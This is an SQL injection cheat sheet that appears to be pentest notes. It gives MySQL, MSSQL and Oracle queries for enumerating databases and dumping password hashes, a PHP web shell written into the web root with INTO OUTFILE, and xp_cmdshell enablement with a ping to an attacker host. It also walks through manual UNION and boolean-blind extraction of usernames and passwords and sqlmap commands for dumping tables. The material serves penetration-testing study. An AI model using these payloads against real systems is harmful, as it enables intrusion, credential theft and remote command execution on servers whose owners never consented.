Enumeration

Gather information from the database (version, users, password hashes, file access) that helps escalate privileges or pivot further.

MySQL

| Information | SQL Query |
| --- | --- |
| Database version | `select @@version` |
| Current database | `select database()` |
| Other database names | `select schema_name from information_schema.schemata` |
| Database user | `select user()` |
| Database user (authenticated as) | `select system_user()` |
| Database users, password hashes | `select host, user, password from mysql.user` (MySQL 5.7+ and MariaDB 10.4+ renamed the column: `select host, user, authentication_string from mysql.user`; needs read access to the `mysql` database) |
| Table names | `select table_schema,table_name from information_schema.tables` |
| Table names of one database | `select table_name from information_schema.tables where table_schema='userdb'` |
| Column names | `select table_name, column_name from information_schema.columns` |
| Column names of one table | `select column_name from information_schema.columns where table_name = 'usertable'` |
| Read system files | `select load_file('/etc/hosts')` (needs the FILE privilege; `secure_file_priv` restricts the readable directory) |
| Write to file | `select "<?php system($_GET['cmd']); ?>",2,3,4 into outfile '/var/www/html/legit.php'` (needs the FILE privilege, a writable path for the mysql OS user and an empty or matching `secure_file_priv`) |

MSSQL

| Information | SQL Query |
| --- | --- |
| Database version | `select @@version;` |
| Current database | `select db_name();` |
| Available database names | `select name from master..sysdatabases;` |
| Check if DBA | `SELECT is_srvrolemember('sysadmin');` (1 = current login is sysadmin) |
| Database logins, password hashes | `select name, password_hash from master.sys.sql_logins;` (needs CONTROL SERVER or sysadmin) |
| Table names (current database) | `select table_schema,table_name from information_schema.tables;` |
| Table names of another database | `select table_name from userdb.information_schema.tables;` (`table_schema` is the schema such as `dbo`, not the database, so address the other database with a three part name) |
| Column names | `select table_name, column_name from information_schema.columns;` |
| Column names of one table | `select column_name from information_schema.columns where table_name = 'usertable';` |
| Command execution with xp_cmdshell (sysadmin required) | `EXEC sp_configure 'show advanced options', 1; RECONFIGURE;` |
| | `EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;` |
| | `EXEC xp_cmdshell 'ping attacker_ip';` (`GO` is a client batch separator, not T-SQL, so leave it out when the statements are sent through an injection point; stacked queries must be allowed) |

Oracle

| Information | SQL Query |
| --- | --- |
| Database version | `SELECT banner FROM v$version;` |
| | `SELECT version FROM v$instance;` |
| Current database | `SELECT SYS.DATABASE_NAME FROM DUAL;` |
| | `SELECT instance_name FROM V$INSTANCE;` |
| Available schemas (Oracle has schemas/owners rather than separate databases) | `SELECT DISTINCT owner FROM all_tables;` |
| Get DBA accounts | `SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';` |
| Database users, password hashes | `SELECT name, password, spare4 FROM sys.user$;` (needs SYS or DBA privileges; from 11g the SHA-1 based hash is in `spare4` and `password` may be empty) |
| Table names | `SELECT table_name FROM all_tables;` |
| Table names of one schema | `SELECT table_name FROM all_tables WHERE owner='web_db';` |
| Column names of one table | `SELECT column_name FROM all_tab_columns WHERE table_name = 'users' and owner='web_db';` |

Exploitation

Understanding the manual attack is required instead of running a tool blindly. Without it you cannot tell why a tool is failing (a filter, an unusual injection point, a different DBMS than it assumes) or carry out the attack by hand when the tool cannot.

MySQL Error Based Manual Example

#Find how many columns: raise the ORDER BY position until the page errors; the last working value is the column count
id=1 order by 1 #No Error
id=1 order by 2 #No Error
id=1 order by 3 #No Error
id=1 order by 4 #Error, so the query returns 3 columns

#Find which column is reflected in the page. id=-1 suppresses the legitimate row so only the injected row comes back
id=-1 union select 1,2,3 #The number that shows up in the page marks the usable column
id=-1 union select 1,'abc',3 #No Error and 'abc' is shown: column 2 accepts a string, use it for extraction

#Get table names of the current database through the reflected column
id=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database()

#Get column names of a table
id=-1 union select 1,column_name,3 from information_schema.columns where table_name = 'users'

#Get contents of the columns (0x3a is ':' so username and password are shown separated)
id=-1 union select 1,concat(username,0x3a,password),3 from users

Boolean based Blind SQL Injection

#Verify (numeric parameter)
id=1 AND 1=1 #Loads normally
id=1 AND 1=2 #If the parameter is injectable the page no longer shows the record
#For a string parameter keep the quotes balanced: id=1' AND '1'='1 and id=1' AND '1'='2

#Check whether the first table name in the current database starts with 'a'. If it is true the page loads normally, otherwise it does not.
#Walk the character set for each position: SUBSTRING(..., 2, 1) tests the second character, limit 1,1 moves on to the second table.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = 'a'

id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = 'b'

SQLMAP

Sqlmap is a popular tool that automates detection and exploitation of SQL injection (boolean and time based blind, error based, UNION and stacked queries). It still fails on unusual injection points, filters or WAFs, which is when the manual techniques above are needed.

#Capture the request using Burp Suite and save it to a file called post.txt, then (--technique E limits sqlmap to error based injection):
sqlmap -r post.txt --technique E --threads 5 --current-db --dbms=mysql

#Find tables
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database --tables

#Find Columns
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database -T users --columns

#Dump contents
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database -T users --sql-query="select username,password from users"

Reference:

https://sqlwiki.netspi.com/attackQueries/informationGathering/

https://portswigger.net/web-security/sql-injection/cheat-sheet